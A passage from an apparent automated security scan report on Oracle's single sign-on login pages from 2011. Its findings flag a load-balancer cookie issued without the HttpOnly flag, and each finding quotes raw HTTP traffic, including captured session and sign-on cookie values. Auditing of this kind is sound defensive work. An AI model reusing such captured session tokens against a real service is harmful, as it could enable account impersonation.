GET /mysso/sso_loginui/oralogo_small.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 2059 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBom6uHK6EVADUS1EHWFB01t_cB X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^....[SNIP]...
13.102. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-l.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/red-b-l.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 304 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBnj6uHK6EVADUS1EHWFB01t_c6 X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a.................................................................ST................XY............................TV............................PQ....................................................[SNIP]...
13.103. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-m-bg.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/red-b-m-bg.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 154 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBpw6uHK6EVADUS1EHWFB01t_cE X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a.......................................................................................................!.......,...........`cY.C<.uE.rP..$.".KU1E..;
13.104. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/red-b-r.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/red-b-r.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 319 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXC986uHK6EVADUS1EHWFB01t_cg X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a............................................MO.......MN.......PQ.......ST............................................................................................................................[SNIP]...
13.105. https://login.oracle.com/mysso/sso_loginui/sso_check.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/sso_check.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/sso_check.js HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
